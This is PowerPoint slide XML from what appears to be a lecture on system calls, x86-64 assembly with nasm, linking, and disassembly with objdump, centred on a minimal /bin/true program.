            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Also implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>using stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>But again, things are more complicated vs. intra-program control flow transfers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94549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 smtClean="0"/>
              <a:t>System Calls</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="184" name="Table 184"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1869152420"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="484775" y="1620527"/>
          <a:ext cx="11251033" cy="505883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8002"/>
                <a:gridCol w="4861044"/>
                <a:gridCol w="4781987"/>
              </a:tblGrid>
              <a:tr h="126079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Instruction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Condition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Description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253724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700" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1700" dirty="0" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700" dirty="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 err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> - 4
Mem(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>) ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Succ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> – 4</a:t>
                      </a:r>
                    </a:p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Mem(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>) ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>cs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:sym typeface="Helvetica Light"/>
                      </a:endParaRPr>
                    </a:p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…</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eflags</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eflags</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> &amp; DISABLE_PROTECTION_MASK</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>
</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Addr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>IVT[x]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>)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Push </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> code segment, flags, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>, and stack segment onto the stack. Disable protected mode (by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>modifing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> flags). Change </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> to the address of the interrupt handler specified in the Interrupt Vector Table (IVT)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126079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700" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>syscall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>sysenter</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700" dirty="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…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Similar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> to int. Pushes key registers, disables protection, changes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> to the address of the system call handler specified by the OS in the GDT.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41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35"/>
            <a:ext cx="8229600" cy="849153"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System Call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57121" y="1997261"/>
            <a:ext cx="1627221" cy="42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857122" y="5838451"/>
            <a:ext cx="1627221" cy="417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IVT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5669" y="1509758"/>
            <a:ext cx="1708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Main Memory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7119" y="1997261"/>
            <a:ext cx="1627221" cy="204063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8856657" y="3146809"/>
            <a:ext cx="1627682" cy="33946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0x80 Handler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56658" y="4918318"/>
            <a:ext cx="1627221" cy="71845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User Program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80025" y="907999"/>
            <a:ext cx="7092920" cy="60248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Software executes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0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes EIP, CS, and EFLAGS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CPU transfers execution to the OS handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look up the handler in the IVT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switch from ring 3 to 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executes the system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the processes state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use EAX to locate the system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the system call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restore the processes state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put the return value in EAX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Return to the process with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iret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/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pops EIP, CS, and EFLAGS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switches from ring 0 to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56196" y="3578392"/>
            <a:ext cx="1627682" cy="33946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Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Table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56196" y="2693483"/>
            <a:ext cx="1627682" cy="33946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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()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02379" y="2025584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OS Code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8077200" y="4757472"/>
            <a:ext cx="805892" cy="72482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EIP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5578" y="5896495"/>
            <a:ext cx="1413164" cy="3048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945590" y="3593602"/>
            <a:ext cx="1445320" cy="3048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6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3.88889E-6 -0.2632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2632 L -3.88889E-6 -0.33357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33357 L -3.88889E-6 -0.26319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2632 L -3.88889E-6 -7.40741E-7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9" grpId="0" animBg="1"/>
      <p:bldP spid="2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Writing in Assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 2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Ok, enough review, let's write a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>In keeping with the slides, we'll use an Intel syntax assembler called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>asm</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1" smtClean="0"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>also works, feel free to use GNU gas if you can't stand Intel syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Let's write the simplest possible program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Not hello world, instead /bin/true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368396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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="110790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/bin/true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1571290"/>
            <a:ext cx="10515600" cy="49021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r>
              <a:rPr sz="24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bits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smtClean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64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we're writing a 64 bit program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r>
              <a:rPr sz="24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section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2400" dirty="0" smtClean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text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place this in the main code section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r>
              <a:rPr sz="24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extern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_</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean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exit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we reference a global symbol (exit)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libc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functions are prefixed with '_'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r>
              <a:rPr sz="24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global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_</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean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start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declare _start as a global symbol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this creates a symbol table entry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required for linker, runtime loader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r>
              <a:rPr sz="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean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start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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:	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_start is the default ELF entry point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err="1" smtClean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 smtClean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0x00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zero out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the first argument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_</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" smtClean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exit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call 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exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1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=0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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4163">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="460375" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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int3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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raise a breakpoint if we get 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here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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(we shouldn’t)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1850508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Assembling, Linking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 2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6861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean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-f elf64 -o </a:t>
            </a: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true.o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 true.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>First assemble the program to an object file </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>true.o</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="396861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr sz="1800"/>
            </a:pP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ld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 -o true </a:t>
            </a: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true.o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 -</a:t>
            </a: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lc</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0">
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Link it as an ELF executable against </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="396861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"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/lib64/ld-linux-x86-64.so.2 ./true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Run it using a runtime loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="396861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"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echo $?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Check the exit code (should be 0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3710527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74142"/>
            <a:ext cx="10515600" cy="3478506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computers don't execute source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead, they use machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compilers translate code from a higher level to a lower one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this context, C → assembly → machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="compiler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5624" y="1454581"/>
            <a:ext cx="8948584" cy="2233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594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Disassembly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Disassembly is the process of recovering assembly from machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Not to be confused with decompilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Requires knowledge of binary format and ISA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Distinction between linear sweep and recursive descent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Linear sweep begins at an address and continues sequentially until an error or the buffer is exhausted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Recursive descent begins at an address and follows program control flow, (hopefully) discovering all reachable code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2596338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objdump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 3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&gt; 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objdump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 -d -M intel true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2400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0000000000400230 &lt;_start&gt;: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  400230:       48 c7 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c7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 00 00 00 00    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    rdi,0x0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  400237:       e8 e4 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ff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ff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ff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          call   400220 &lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>exit@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;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400" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>  40023c:       cc                      int3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Tool to display information about binary objects for a multitude of architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Includes a simple linear sweep disassembler</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270632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objdump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&gt; objdump -x true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225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true:     file format elf64-x86-64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true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architecture: i386:x86-64, flags 0x00000112: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EXEC_P, HAS_SYMS, D_PAGED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>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>start address 0x0000000000400230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2250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/>
              <a:t>Also useful for understanding ELF objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 3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52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04854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r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Systems calls are special control flow transfers from program code to OS code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Used to access OS-level APIs and devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Accept parameters just like other procedures/functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1850" dirty="0" smtClean="0"/>
              <a:t>But the argument passing format is different</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Change protection-level from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1" smtClean="0"/>
              <a:t>Userland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> (Ring 3) to Kernel Mode (Ring 0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Also implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>using stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>frames</a:t>
